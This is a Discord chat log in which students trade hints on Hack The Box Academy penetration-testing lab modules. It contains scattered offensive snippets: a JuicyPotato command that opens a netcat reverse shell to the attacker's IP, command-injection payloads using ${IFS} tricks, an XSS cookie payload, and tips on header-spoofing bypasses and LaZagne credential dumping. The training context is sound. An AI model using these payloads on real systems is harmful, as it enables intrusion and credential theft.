Section: Infiltrating windows

#

Successfully exploited the target system,

#

Goddamn
There was the $ at the end and it appeared to be part of shell prompt

#

Evil

manic ermine
# west canopy <@339705798789824512> try using DomainPasswordSpray.ps1 and reproducing the step...

Thanks Jared...has anyone had issues with importing "domainpasswordspray.ps1"? I'm getting:
At C:\Users\AB920\Desktop\DomainPasswordSpray.ps1:261 char:21

  •     Write-Host "$Message: Waiting for $($Seconds/60) minutes. $($ ...
    
  •                 ~~~~~~~~~
    

Variable reference is not valid. ':' was not followed by a valid variable name character. Consider using ${} to
delimit the name.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : InvalidVariableReferenceWithDrive

random cape
west canopy
#

@manic ermine Yes I had to change a line of the script to make it work, specifically line 261

#

@random cape they give a vague clue on one of the pages at the top, after you first sign up and log in to the website. I forget which page though.

rustic sage
#
floral sandal
#

HI, who did file upload attack module?

brazen hinge
#

Hi!, I am with Password Attack Lab - Easy (Examine the first target and submit the root password as the answer.) and i am doing bruteforce with hydra against SSH using username.list and password.list from the resources, this is correct or it is with another wordlists?

#

i tried with both lists for usernames and passwords, and using root as user and some others password wordlists like rockyou, rockyou-30 and the same password.list from resoruces, i splited many times the username.list and have iterate at least 2 times all splited lists :c

#

I do not know if root is the user with whom I have to log in and I only have to find the password, or if I must find the user to later extract the root hash, I think it is more the second option

round cradle
#

I'm in Vulnerability Assessment and should use nessus. It asks me to go to the IP given in the credentials. But when I go it says unable to connect. And I am using vpn correctly.

distant stream
round cradle
crimson atlas
#

Hey hey anyone else having issue connecting through ssh on login brute force ?

knotty hemlock
#

can somebody help me with the DNS section of the "Attacking common services" module? i guess i don't understand properly how subbrute works.

cold marsh
#

anyone can help me in Login Brute Forcing - Service Login? DM me

crimson atlas
#

@tranquil carbon done all may I dm you ?

lofty socket
#

hello guys

crimson atlas
#

Kk 👌

foggy furnace
balmy moon
#

Can I get some help with the hashcat module in particular the hybrid lesson?

rustic sage
#

For anyone working on kali linux (or anything that is not the pwnbox). How do you connect back to your own machine? E.g. when setting up a web server and trying to let an XSS injection fetch something? Which IP address do you use?

hushed knoll
#

I have a question regarding the Extra exercise from the Module: "SECURE CODING 101: JAVASCRIPT "

Extra Exercise: Are you feeling bold?
If you wanted to take it a step further (and prepare for the Whitebox Pentesting 101 module at the same time), it is possible to inject a command that passes the if statement, such that the sendCode function would execute and send the secret message to your HTTP server on our box. To do that, you would have to inject a command that would make the if statement return true, such that it would go into its inner function.

I am no expert in JS, so the (for me) most intelligent way was to try to overwrite the md5 function within the eval function, which worked, but only on a consecutive call of the md5 function. The other solution for me would have been finding a value for which the md5 function outputs the value from the actual statement. But there is no known cleartext for that. So my question is: Is there a general way that an eval in an if statement can be used to cause this if statement to return true or is there a way I can use eval to do such a thing as function overwriting to cause such a behavior to control one part of the statement?

The code for this is more or less something like this:

if (md5(eval('cookie="' + document[cookie] + '"')) == '2b...SNIP...f8') {
    do_this();
}
royal shale
balmy moon
leaden quail
#

hey guys, does somebody know how much datavolume the pwnbox needs? Im Sitting in the Train and think about to do some exercises but just have mobile hotspot😆

#

yeah i know, but I have no idea how data intensive the connection is

west canopy
#

Sure

#

np!

lusty orbit
#

Hellooo

#

I’m new here so idk what to do

red obsidianBOT
naive ravine
unborn tendon
#

Anyone have any help sheets?

rustic sage
#

Can someone give me a hint on "Server-Side Attacks - Skills Assessment"? I tried all the sections on the form that reflected my input and nothing

west canopy
#

@rustic sage try viewing the page source and look at the javascript function

rustic sage
#

ahah, security over obscurity case, they got me, thanks for the tip 😄

knotty falcon
tepid jolt
#

Can someone help me with "command injection" module. Bypassing Other Blacklisted Characters.

tight mesa
#

anyone who has finished the Using Web Proxies module, to ask some related with one of the exercises..!!!

tiny ledge
#

In the Broken Authentication, part 2. How am I supposed to use this script provided? Where do I run it ?

#

I'd need a big nudge forward here to get this started, I have no clue what are they trying to explain in the examples

tiny ledge
tiny ledge
#

Any nudge forward, what am I doing wrong here:

west canopy
#

@tiny ledge don't even bother with the bruteforce script. Try just using burpsuite or Curl to add the x-forwarded-for header , and any username and password should return the flag 🙂

tiny ledge
west canopy
#

@tepid jolt try using a combination of ${IFS} and ${PATH:0:1} to run the command: ls /home

tight mesa
#

who has completed Using Web Proexies?

#

I need some help

#

hints

rustic sage
#

i got a question

#

how do i hack myself?

livid pier
#

meditation

sweet heron
tight mesa
#

cool, give me a sec to take some notes

tight mesa
sweet heron
#

Np!

tulip dew
#

hi

woven copper
#

Hi anyone could give a hint on the AD Enumeration & Attacks - Skill Assessment Part 1
Submit the contents of the flag.txt file on the Administrator desktop on MS01 ?
i m trying using runas and wmic but the webshell crash

radiant dagger
#

ACTIVE DIRECTORY ENUMERATION & ATTACKS - ACL Abuse Tactics. There is no need to hide wley's pass since it's cleartext under Credentialed Enumeration - from Linux

#

Another thing is that the instance is a static IP. I believe it's sharing among us. Don't be surprise to see error/warning when it's telling you that the user already been added to the group.

#

I also think the clean up session is part of solutions for that.

#

Another thing. HTB allows user to crack password under machines once while. I'm failing to do so recently. have to go for my own kali

#

Could anyone let me know if you success run hashcat/john on HTB machines, please? Thank you

west canopy
#

@woven copper I was able to get it by setting up port forwarding and then RDPing with proxychains. DM me and i can walk you through it 🙂

woven copper
#

@west canopy that something you learn on the Pivoting Tunneling module ?

west canopy
#

yep !

woven copper
#

okey i think i prefer take the module and then go back on the AD , thanks for answer me

west canopy
#

you're welcome 🙂

#

@tired bridge DM me if still need help with file upload attacks 🙂

next nacelle
#

Do I need to pay to do the HTB academy?

west canopy
#

With a free account you should be able to unlock the Fundamental modules but for additional modules yes, it will cost money for a subscription or additional Cubes

uncut raptor
#

Module: INFORMATION GATHERING - WEB EDITION
Section: Active Infrastructure Identification
hi folks, i have the most stupid question probably:* Which CMS is used on app.inlanefreight.local? *
How do I scan the vhost specifically? scanning the target machine doesn't throw CMS information

tepid jolt
west canopy
#

@polar widget Sure 🙂

digital pollen
#

im trying to fine tab and im looking dead at it😂

rustic sage
#

sure dm

crimson atlas
#

Hey I still cant connect to through ssh on Service Authentication Brute Forcing
module. Cant ping it, ssh : connection time out, I tried with and without openvpn (plus change openvpn key)

#

Im a bit lost ngl

#

And I test my ssh service and its working well on other target

void shadow
#

Can you share the ss?

crimson atlas
#

ss?

#

ah yea

void shadow
#

ScreenShot.

crimson atlas
void shadow
#

The port's correct?

crimson atlas
#

yep

rustic sage
#

reset target?

crimson atlas
#

done like 10 time ^^

#

doing it for 2 day now

rustic sage
#

are you sure you are asked to connect like that?

crimson atlas
#

yes its writen use that for connect

void shadow
#

The username seems a bit off too

rustic sage
#

i did not do this module sorry.

crimson atlas
#

SSH to 159.65.58.189 with user "b.gates" and password ""

#

this is the sentence

rustic sage
#

ssh b.gates@$IP should work too

crimson atlas
#

append $before IP ?

rustic sage
#

no

crimson atlas
#

a without porot

#

port

rustic sage
crimson atlas
#

done it too

void shadow
#

Can you share me the screenshot of the question and the ip provided in the task?

rustic sage
#

then it will promt for a password

crimson atlas
#

sure

rustic sage
#

normaly

crimson atlas
rustic sage
#

then

void shadow
#

You found the password?

rustic sage
#

ssh b.gates@159.65.58.189

#

then enter to not specifi password

#

bruh

crimson atlas
#

yup

rustic sage
#

look at the port buddy

#

are you sure its 22 ? 😄

void shadow
#

If yes
Use the following command
ssh b.gates@159.65.58.189 -p 31006

rustic sage
void shadow
#

Ah that's my keyboard fking cause I am on phone

crimson atlas
#

taht what they prvide

rustic sage
crimson atlas
#

that why im confuse af

rustic sage
#

your target is configured to run over 31006

#

replace 22 by 31006

crimson atlas
#

oooh

#

working

#

ahah

void shadow
#

Nice

rustic sage
#

when you see this

#

10.0.0.0:PORT

#

after the : is the port

crimson atlas
#

yea yea

#

but I didnt know

#

it was a ssh prot

#

port

rustic sage
#

it can be any port 😄

crimson atlas
#

Their not some reserved one ?

rustic sage
#

you can configure it to go on 1337 if you want

#

22 is the default one

crimson atlas
#

sure

#

Thank guys appreciate

void shadow
#

If the task have given you a port
You are expected to use that port
If not provided. It can be either default or you have to search by scanning

crimson atlas
#

Indeed

rustic sage
#

well hf now

crimson atlas
#

Yup thank again 👽

rustic sage
#

Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.
Need help on that question I cannot find the second flag.

#

find / -name flag.txt
nvm I found it.

main geyser
#

hi guys i need some help

#

it can save my sis's life you can helpme

#

@uneven forum

#

@sick fulcrum

languid dawn
#

Please don't ping for no reason

#

If a life is at stake contact your emergency services

main geyser
#

do you know hacking?

languid dawn
#

No-one here does, we're just a rôle playing server

#

We're huge fans of Mr robot

main geyser
#

oo

main geyser
languid dawn
languid dawn
#

And please keep it legal or we'll have to take sanctions

languid dawn
#

Ban you

main geyser
#

but can the illigeal stuff done in dms?

#

just asking

#

don't take seriously

languid dawn
#

I suggest reading discord ToS

#

Also if it's illegal why would you think it's ok

main geyser
#

oo

#

ok

rustic sage
#

Hoping anyone here can help me with out-of-bound connections. Background: I'm working my way trough the modules on my Kali Linux VM running on my Macbook. The VM is connected to the openvpn academy file. I am stuck on ALL the questions that require you to make an out-of-bound connection (AKA connecting from the target machine to my VM for e.g. a remote shell or XXE injection). Whatever IP address I use, I'm not able to connect from the target machine to my web server running on my VM). Really hoping someone could help me out with this.

#

Are there any extra steps involved in order to allow a remote connection back in to your VM?

#

Pinging anyone that is not working on the parrot/pwnbox but on a VM

distant stream
rustic sage
surreal pelican
#

Hi all!
I have a problem. I didn't understand the meaning of this question :/

The target has a specific web application running that we can find by looking into the HTML source code. What is the name of that web application?

surreal pelican
#

Here is screenshot

distant stream
# surreal pelican Here is screenshot

You have to find the name of the web application used. So can can find a exploit for this web app. Check the html source as it says. You will find a name which app it is…. Have you checked the source code of the page-view source-?

surreal pelican
#

Thanks a lot, it works

spare condor
#

Login Brute Forcing Skills Assessment, someone pleaseeee?

#

I think I'm doing the correct steps, but can't login into ssh.

Solved this

supple oasis
#

Hi everyone

#

1st time in discord

#

I'm working on USING THE METASPLOIT FRAMEWORK module and I'm stack in session where i try to exploit the machine's web app elFinder

#

I try all option i found in msf "search elFinder" but the machine is not vulnerable

#

Can anyone give me a hint?

supple oasis
spare condor
surreal pelican
surreal pelican
#

Section: Sessions & Jobs

tiny ledge
#

Anyone using Brave Browser, Is there fix for the 'Hint' and 'Cheat Sheet' not working:

spare condor
supple oasis
spare condor
#

Maybe try another exploit?

supple oasis
#

I tried those s far

supple oasis
spare condor
balmy moon
#

Can anyone help me with Cracking Common hashes? I'm struggling with a solution.

spare condor
#

Did you solve this??? @plush garden

surreal pelican
rustic sage
#

need help on skill assesment sqlmap essentials i'm kinda stuck

tiny ledge
#

Anyone solved: Broken Authentication - Predictable Reset Token, all I get is this:

rustic sage
#

Also, I remember that the MD5 hash generated on the server was in microseconds, so you might want to perform a multiplication somewhere

rustic sage
polar widget
balmy moon
rustic sage
#

what is the question?

balmy moon
rustic sage
#

echo "7106812752615cdfe427e01b98cd4083" > hash.txt

#

hashcat hash.txt /usr/share/wordlist/rockyou.txt

#

you can use hashid to see what hashing type is

#

or hash-identifier

balmy moon
#

I have tried the md5 and NTLM modes, from Hash identifier, no success.

The hint said use a rule and I tried the hybrid mode from previous examples.

polar widget
balmy moon
polar widget
#

Or at times we gotta read the necessary theory and practice them right away, this approach I admire it too

#

HTB academy is doing a great job

So when I cracked some hashes in there, I straight away jumped into their skills assessment,
Last question was challenging and fun, spent some time scripting stuffs

#

And solved em all

balmy moon
#

Interesting. Some academics say to read the questions, then read the material so that you can see the answers to look for.

polar widget
#

Having familiarity with subject

#

Well, we're gonna have the cracking with hashcat achievement under our belt tonight

spare condor
#

Anyone knows why ffuf can't find the directories?

#

While with gobuster, I can find them

polar widget
#

That's why we validate using different tools
This learning is very crucial while dealing with forensics artefacts too,

#

Some tools just don't work as expected, and you'll never know
Because you're expecting a output in the end of day

spare condor
polar widget
#

I can't really say about that
Will jump into it later

spare condor
#

That's weird...if someone knows why this happens, please tell me

polar widget
polar widget
rustic sage
polar widget
#

No I'm asking the exact section its from

#

Need to know the background of hash

rustic sage
#

I dont know i dont have the module unlocked

polar widget
#

Found it

#

Cracked it

rapid hill
#

is parrot linux work on a 3gb ram machine ?

#

i currently using linux mint but i want switch to parrot security

stable sparrow
#

Hey guys, can anybody help with the "Bypassing Other Blacklisted Characters" question in the "Command Injections" module?

I have been trying ||127.0.0.1${LS_COLORS:10:1}${IFS}${PATH:5:1}${PATH:2:1}${IFS}${PWD:0:5}${LS_COLORS:10:1} which should be "127.0.0.1; ls /home;"|| but it's not working... could someone please point out what I'm doing wrong? thanks! 🙂

prisma coral
spare condor
balmy moon
polar widget
lethal atlas
sturdy solar
#

What is the FQDN of the IP address 10.10.34.136? Anyone know what to do here? I have been trying to zone transfer, but it doesn't seem to work

bitter beacon
#

no need to use $

edgy flame
#

Any one able to help with " Submit the contents of the flag.txt file on the Administrator desktop on MS01" on AD Enumeration & Attacks - Skills Assessment Part I? I can't get a shell on this box

surreal pelican
#

The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer.

Does anyone know how to solve this problem?
Module: Metasploit Framework. Section: Sessions & jobs

surreal pelican
polar widget
lethal atlas
#

Just want to put this out there for anyone just getting started. Do yourself a favor before attempting the "Information Gathering - Web Edition" module, go do the "Footprinting" module first. It will help you tremendously with Active Subdomain section.

undone girder
#

trying to tackle this last question on web requests and i cant seem to wrap my head around it, any help would be appreciated!

lethal atlas
broken warren
#

Has anyone had trouble installing tplmap? The instructions in server side attacks work for me, up until pip install -r requirements

buoyant escarp
#

hello everyone, im trying for hours now, the academy module LFI. im on the last question, i can read the content of index.php via using base64 filter in the get param. but other than than im not sure what to do now because index.php appends .php at the end of the file :/ so i cant read other files.

gloomy tangle
#

Hi. Can someone give me a hint with Module ATTACKING COMMON SERVICES Section Attacking FTP. I am trying to bruteforce the user on FTP. I know Cry0l1t3 likes making modules hard (had it very difficult on Password Attacks and not very enjoyable) but I find sometimes we have to take different paths from the section to find out things. Also the FTP 2xxx appears and dissappears.

supple oasis
#

Hi guys, I'm trying to exploit with a PAYLOAD to get sudo old vesrion access but I'm stack here

undone girder
void shadow
#

mind sharing the screenshot after running show options?

rustic sage
#

aahihihih

#

\

buoyant escarp
#

php://filter/write
is it possible to use write filter to overwrite a file with LFI ?

quiet prism
#

i'm doing the skills assessment for javascript obfuscation and would like a little help please

#

I've got deobfuscated code and it's telling me to find a secret key but don't see anything like that in the code

supple oasis
rustic sage
#

okoko

polar widget
supple oasis
#

yes, but the session isn't established @polar widget

buoyant escarp
#

you can see it by manually concatting the strings in the varible called flag

#

the same for the log at the bottom

rustic sage
#

how i can start hacking

#

??

polar widget
supple oasis
#

I got the machines shell @polar widget and I need to get root privileges

quiet prism
#

i already used that

polar widget
#

then load the module from msfconsole which deals with the vulnerable sudo version

#

@supple oasis

quiet prism
#

lol nope

#

it has something to do with /keys.php

#

but that doesn't work

rustic sage
#

its fail

#

dont use that

#

maybe lock your pc

supple oasis
polar widget
#

show me what's in the options set for that specific module

quiet prism
#

i got it

#

send a post request to the url with /keys.php and you get an encoded string

#

time to decode

rustic sage
#

@high zinc

polar widget
#

that's why

#

lmfao

quiet prism
#

apologies. xD

#

deleted it all i think

red obsidianBOT
rustic sage
#

???

#

dead server

supple oasis
buoyant escarp
#

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

i can read the php files content but only php files because it appends them at the end of the parameter.
im not sure how im gonna get remote code execution

im stuck in the very last task for hours now
https://academy.hackthebox.com/module/23/section/513

rustic sage
#

why you tell me what to do

#

??

#

this server is dead

polar widget
shadow verge
#

Does hydra handle well CRLF line terminators?

fair cove
#

Hey everyone, any hints for Firewall and IDS/IPS Evasion - Medium Lab

dim flame
#

hey guys, im doing #Attacking SQL Databases section on first question. I have the hash to crack now, but I don't know how to understand what kind of hash is, to crack after with hashcat. How can I undestand that? I tried to query google with hash, or hash-identifier, but nothing...

lethal atlas
#

you can also use dcode but I think hashid is explained in that module

dim flame
rustic sage
#

Can anyone help me out with the SQL injection skills assessment. I have done a lot of enumeration/injections and found credentials Im just having trouble with getting a shell

lethal atlas
#

my pleasure.

lethal atlas
#

@drifting knoll has the NMAP module been changed? The method I used to solve the medium lab no longer works the way I originally solved it. I am just curious? I was able to solve it another way but it bugs me that what I used before fails now.

uncut raptor
#

Module: INFORMATION GATHERING - WEB EDITION
Section: Active Infrastructure Identification
hi folks, i have the most stupid question probably:* Which CMS is used on app.inlanefreight.local? *
How do I scan the vhost specifically? scanning the target machine doesn't throw CMS information

hollow notch
#

Hey guys! Could anyone help me with the question from the module "Network Enumeration with Nmap / Service Enumeration" - "Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer." I've tried so many options and no luck so far. What am I missing? Appreciate your help. Just need to understand the logic behind this question.

spare condor
#

Hey, can I DM you regarding this one? I run the Responder then execute the commands in MSSql but can't get the hash.

#

or you? 🙃

hollow notch
vital adder
spare condor
west canopy
#

@uncut raptor try adding app.inlanefreight.local to your /etc/hosts file, and then use whatweb 🙂

uncut raptor
west canopy
#

yep

uncut raptor
#

can't seem to get edit access on the hosts file

west canopy
#

there should be a file on the desktop called my_credentials.txt i think

#

so you can use that password to switch to root user , then edit the file 🙂

uncut raptor
#

it does not want to give up the CMS lol, i did echo "TARGET_IP app.inlanefreight.local" on hosts and the new line is there, but whatweb prints the same as always, OS , plugins, etc, but not cms

umbral yacht
#

Hey everyone. I need help with the module on Windows Fundamentals. Im on the last question in the final section called Skills Assessment. The question is “List the SID associated with the HR security group you created.” I’ve been at this for two hours and I can’t answer it. If someone who has completed this module, help me that would be great. You can DM me so this channel won’t have any spoilers. Thanks ☺️

west canopy
#

@umbral yacht I got you dawg 🙂

umbral yacht
#

Thank you! 😩

boreal vine
#

Hey someone for Windows Privilege Escalation I have a question ?

raven cairn
#

What is wrong with my command? This tool sucks ass (wordpress skill assesment)

wheat garden
#

windows privilege escalation skill assessment part 1 anyone do this module? seems obvious escalation paths of Juicypotatoe and printspoofer dont work? getting this error when running juicy {potatoe c:\Windows\Temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\Windows\Temp\nc.exe 10.10.14.135 5555 -e cmd.exe" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375
COM -> recv failed with error: 10038}

wheat garden
sweet heron
wheat garden
raven cairn
#

Maybe I'm just dumb,

sweet heron
#

How about a blog or something? (hope I'm not mixed between module let me go check)

sweet heron
#

Look for the blog link. Where does it's trying to get you to? You just need to update your /etc/hosts to be able to access that vhost, Use the same IP.

sweet heron
raven cairn
wheat garden
raven cairn
#

@sweet heron Found what you are talking about. Thank you. Sorry for confusion

steep loom
#

can anyone help me out with Skills Assessment - File Upload Attacks? Please dm me. I have it mostly figured out already, just stuck on one step!

fiery trench
#

Looking for help on the File Upload Attacks Assessment as well. I was able to bypass the file upload but unsure how to locate the file nor read any php file, tried using some methods to try reading the config files but still no success.

stable sparrow
#

Hey team, can anybody give me a nudge for Command Injection - Skills assessment?
I'm struggling to get my payload working.

Here is what I have so far:
||http://157.245.46.136:30166/index.php?to=tmp&from=51459716.txt${LS_COLORS:10:1}${IFS}c'a't${IFS}${PATH:0:1}flag.txt${LS_COLORS:10:1}&finish=1&move=1||

I getting the following error:
||Error while moving: mv: cannot stat '/var/www/html/files/51459716.txt': No such file or directory
mv: cannot stat 'cat': No such file or directory
mv: cannot move '/flag.txt' to '/var/www/html/files/tmp/flag.txt': Permission denied||

Any hints? 🙂

west canopy
#

@stable sparrow try putting your payload after to=tmp

#

Because for example, if we were using the mv command in linux it would look like: mv /original/file /destination/file . So if we were to chain a command after this, it would come AFTER the destination. If that makes sense

#

@steep loom @fiery trench DM me 🙂

gloomy tangle
spare condor
#

Password Attacks Module/Password Mutations Section:

I created a wordlist with best64.rule, brute force ssh, hydra running 1 hour and still no result...

Any ideas/hints?

spare condor
# polar widget 1hr damn :/

Yes...do I have to create the list with another rule maybe? But is very difficult to guess how/which rule to use...

#

That's why I chose the best64.rule
It also says "One of the most used rules is best64.rule", that's why I chose it

polar widget
#

I'll let you know my strategy then

runic rampart
#

Friends, tell me what is required of me, I don’t understand the question?😛 (I translate the question into my own language)

Nessus Skills Assessment.
What were the targets for the authenticated scan?

spare condor
distant stream
rustic sage
#

need help on sqlmap essentials skill assesment

surreal pelican
sweet heron
#

AD enumeration and attacks, skills assessment part II: Second question, what is the user's cleartext password. I've got the NTLMv2 hash, but can't crack it... Any nudge?

rustic sage
#

@languid dawn

sweet heron
languid dawn
tiny ledge
#

Any nudge forward on: BROKEN AUTHENTICATION - Second Question: Request a reset token for htbuser and find the encoding algorithm, then request a reset token for htbadmin to force a password change and forge a valid temp password to login. What is the flag? | After decrypting the temp pass from Base64, what am I supposed to get from this random set of numbers, I'm drawing complete blank

languid dawn
#

@rustic sage you can hit the big red button for that kinda stuff :D

#

Aka srs rule break

rustic sage
#

hein

#

he was promoting a +18 server

languid dawn
#

Yeah, there's a role we all have in big red letters, use that so you're sure a mod looks into it

#

Big red button

rustic sage
#

serious rule break?

languid dawn
#

It's fine though I was here

#

Ye

rustic sage
#

okok

#

yeah i tagged you because you were talking in #general

#

but nice to know

hexed tartan
#

Hello, can someone help me with the live assessment of module SHELLS & PAYLOADS? if so plz me, been stuck one this for a while now

drifting knoll
timber tide
#

AD Enumeration and Attacks: DCSync section. The last task to provide the NTLM hash for khartsfield. I was able to dump the hashes using secretsdump.py and grepped the output file for the user, but it won't accept that as the answer for the task. I also tried to run mimikatz lsadump::dcsync for the user and it's giving me an error that i've been trying to troubleshoot since yesterday. Any advice?

#

Nevermind! Reminder to self: Be mindful of : characters in hash string

native comet
#

sqlmap case 7 help anyone?

void shadow
#

What's the issue if I may know? Haven't done the module but might help

brazen hinge
#

Hello everyone! I´m in Password attack Medium Lab and got the file 'Doc.zip' which already is cracked and in the file inside have an user/password with which I can log by ssh, but once I'm inside I can't do anything, some tip?

void shadow
#

What do you exactly mean by "can't do anything"? Like not able to run commands or something else?

brazen hinge
#

in this case i cant do the things learned in module, the next step would be have to get the hash of the root user and crack it, but i cant read /etc/passwd

void shadow
#

Might have to perform some Privesc or find a way to read the file

#

Also the password hash is stored in /etc/shadow

native comet
sweet heron
#

AD Enum and Attacks, skills assessment part II, the password spray to obtain weak creds for another user: I fixed the domainPasswordSpray.ps1 file, but when running it, it doesn't find any users. I manually pass a list I builded up, but waiting 1 min between sprays makes it very long (it just hangs)! I already know the right password. Any hint?
kinda solved

lethal atlas
#

Anyone online that can help with footprinting, IMAP and POP3

sweet heron
lethal atlas
#

I have answered all the other questions but I seem to be missing something.

#

I can connect to imaps or pop3s, I can login as robin, but I cannot seem to find any info while logged in.

jaunty umbra
#

哈喽

sweet heron
lethal atlas
sweet heron
#

AD enum and attacks, Skills Assessment part II: I can't seem to connect using mssqlclient. From the error message, I guessed I needed to connect to it from the host I have a foothold, but I'm at a lost using PowerUpSQL to send commands.

#

The admin's desktop flag on SQL01

sweet heron
native comet
#

any help in sqlmap skills assesment i cnat find the vuln injection point

sweet heron
native comet
#

yes i found the attack vector

#

but it says json id not injectable

sweet heron
#

Capture the request with burp and save to as a file to use with -r. What command are you using? You can DM.

native comet
#

sure

rustic sage
#

i have i code but still dont work , why

lethal atlas
rustic sage
#

its doesnt work

lethal atlas
#

what doesnt work @rustic sage ?

sweet heron
#

Stuck at AD enum and attacks, Skills Assessment II: getting the admin flag on MS01 host. I'd need a nudge if anyone is available.

west canopy
#

@sweet heron try running lazange on SQL01 to find the password for ||mssqlvc|| and then use the credentials to RDP into MS01

sweet heron
shadow verge
#

@sweet heron when you run lazagne you can see cleartext creds

sweet heron
#

"0 passwords have been found". And I am nt authority\system

shadow verge
#

how did you run lazagne

sweet heron
#

.\lazagne.exe all

shadow verge
#

Well maybe you have to reset the box, because I got cleartext creds with system and lazagne

sweet heron
#

I'm on 172.16.7.60

shadow verge
#

I had cleartext password on the place where it stands DefaultPassword

#

which host is 60

#

hostname

sweet heron
#

SQL01

shadow verge
#

it should be right

#

I can dm you the screen shot of my lazagne tho

tight mesa
#

anyone who has completed XSS module?

west canopy
#

@sweet heron That's super weird, not sure why your lazagne isn't dumping the password

rustic sage
#

Title says with Hydra, but command uses Medusa

sweet heron
tight mesa
#

anyone who has achieved the XSS stored exercise?

#

I'm trying to inject the subjected payload but isn't working

wheat garden
#

Any one done the windows privilege escalation module 1st skill assessment.? need a tip on how to escalate the privileges tried juicypotato.exe and print spoofer.exe they dont seem to work.

west canopy
#

@wheat garden DM me 🙂

wheat garden
west canopy
#

@tight mesa this is the first section of the module right?

tight mesa
#

yes bro

#

I tried several different payloads with no success

west canopy
#

it should just be: <script>alert(document.cookie)</script>

tight mesa
#

nope working, looks like is sanitizing the input

west canopy
#

Literally just worked for me first try

gleaming sequoia
#

good evening 🙂 i think there a kind of mistake or I simply don' t understand the type of answer in the Nessus module skill assestment, I tryed with the IP , the Server Names with both...no way. Can please anyone help me :

west canopy
#

@gleaming sequoia it should just be a single IP address (the machine that was scanned)

tight mesa
gleaming sequoia
west canopy
#

It's just one IP address.

#

@tight mesa maybe try a different browser?

gleaming sequoia
#

ok thank s a lot!

tight mesa
west canopy
west canopy
tight mesa
sweet heron
#

Any hint welcomed for AD Enum and Attacks, Skills 2: getting to DC01. Can't even connect to it yet! Been working on this assessment all day! FeelsGoodMan

west canopy
#

@sweet heron were you able to find the credentials for the ||CT059 ||user?

sweet heron
#

yes!

west canopy
#

We should be able to RDP into DC01 with that user's credentials 🙂

sweet heron
west canopy
#

😦

sweet heron
#

I'm unlocky tonight! Almost at the end though!

brazen hinge
#

Hi! Im on Password attack lab - hard and i got a Backup.vhd, is relevant?

stable sparrow
#

Hey team! Could somebody lend a hand with File Upload Attacks - Whitelist Filters?

I have fuzzed the upload function and have a series of "File Successfully uploaded" responses, but for some reason when I try to navigate to it, the file can't be found... Any ideas?

filename="shell.phar%20.jpg"
URL: http://157.245.33.77:32203/profile_images/shell.phar .jpg

vital adder
#

@stable sparrow dm me if you still need help

vital adder
brazen hinge
#

😮 thanks!

pliant summit
#

are there any htb academy modules that go over using burp suite?

rustic sage
#

proxy one does i guess

#

web

spare condor
#

On the new module "Information Gathering - Web Edition" on the "Active Infrastructure Identification" section and 2nd question "Which CMS is used on app.inlanefreight.local? (Format: word)" ,
I'm 100% sure my answer is correct but it shows an error. Anyone to DM my answer so I resolve this?

pliant summit
#

Hey guys in the modules section of the using the metasploit framework module. For some reason, I cant execute the exploit to complete the question

spare condor
#

Plus to this -> #modules message
I have another issue, in question "Find and submit the contents of the TXT record as the answer.", I found the TXT record but can't submit the answer.

I have some issues with this module. Can I DM someone?

rustic sage
#

the flag dosent work?

spare condor
spare condor
rustic sage
#

i have no idea

#

and i dont own the module so i wont be helpfull sorry

#

looks like they want the content of a txt file

#

is it the right one?

spare condor
#

@drifting knoll Can I DM you about the Information Gathering - Web Edition ??

tiny ledge
#

Any hints on this: Login with the credentials "htbuser:htbuser" and abuse the reset password function to escalate to "htbadmin" user. What is the flag? | Which seclist to use ?

#

I'm trying to bruteforce it, but it's way too slow with 10k passwords:

languid dawn
tiny ledge
#

Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag? | Are they looking for htbadmin here? I've encoded my new cookie while using the same time as from the htbuser cookie, but it still gives me this:

golden flame
#

can you please give me a hint ?

winged zephyr
#

Hey i wanna ask, why everytime i want to scan the htb from my computer and using openvpn, it doesnt give me any port open

#

But when i try with web pwnbox, it returned 5-8 ports opened

#

Is it because i havent configured proper settings or something?

polar widget
#

Reset the VPN connection

formal sphinx
#

What is a good wordlist for last exercise on ffuf?

tiny ledge
spare condor
# distant stream Dm

@distant stream DM you regarding the "Passwd, Shadow & Opasswd" of Password Attacks ???

sweet heron
#

Help! Since yesterday, I can't even ping the target for the Windows Priv Esc Skills Assessment part I. I can't interact with targets at all. Am I missing something or is there a bug. Re-downloading a new vpn doesn't help.

#

Skills Assessment II works fine.

rustic sage
#

Does anybody know if the final assignment of the Hacking Wordpress module requires a password attack? Been running rockyou.txt for a while now but might be chasing a rabbit hole.

golden flame
surreal pelican
#

135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
5000/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Using which port I can get access to shell?

sweet heron
rustic sage
#

@sweet heron I was having some connection troubles as well with a different module. I switched to a different VPN server which resolved the issue for me